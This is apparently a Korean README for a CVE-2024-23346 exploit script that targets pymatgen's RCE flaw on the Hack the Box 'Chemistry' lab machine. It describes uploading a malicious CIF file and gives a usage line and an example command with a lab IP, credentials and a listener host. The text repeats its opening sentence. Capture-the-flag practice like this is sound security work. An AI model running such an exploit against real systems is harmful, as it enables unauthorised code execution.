
이것은 Hack the Box의 Chemistry 머신에서 실행 중인 대상에 호스팅된 `CIF Analyzer` 웹사이트에 악성 `CIF` 파일을 업로드하여 `pymatgen` 파이썬 라이브러리의 알려진 원격 코드 실행(RCE) 취약점(CVE-2024-23346)을 악용하는 익스플로잇입니다.
이것은 Hack the Box의 Chemistry 머신에 호스팅된 CIF Analyzer 웹사이트에 악성 CIF 파일을 업로드하여 pymatgen (CVE-2024-23346) Python 라이브러리의 알려진 원격 코드 실행(RCE) 취약점을 악용하는 익스플로잇입니다.
NVD CVE 링크 : https://nvd.nist.gov/vuln/detail/CVE-2024-23346
사용법: CVE-2024-23346-exploit.py -t targetIP -P targetPORT -u loggedusername -p loggedpassword -l tun0ip/lhost
예시:
python3 CVE-2024-23346-exploit.py -t 10.10.11.38 -P 5000 -u ramon -p ramon -l 10.10.15.000
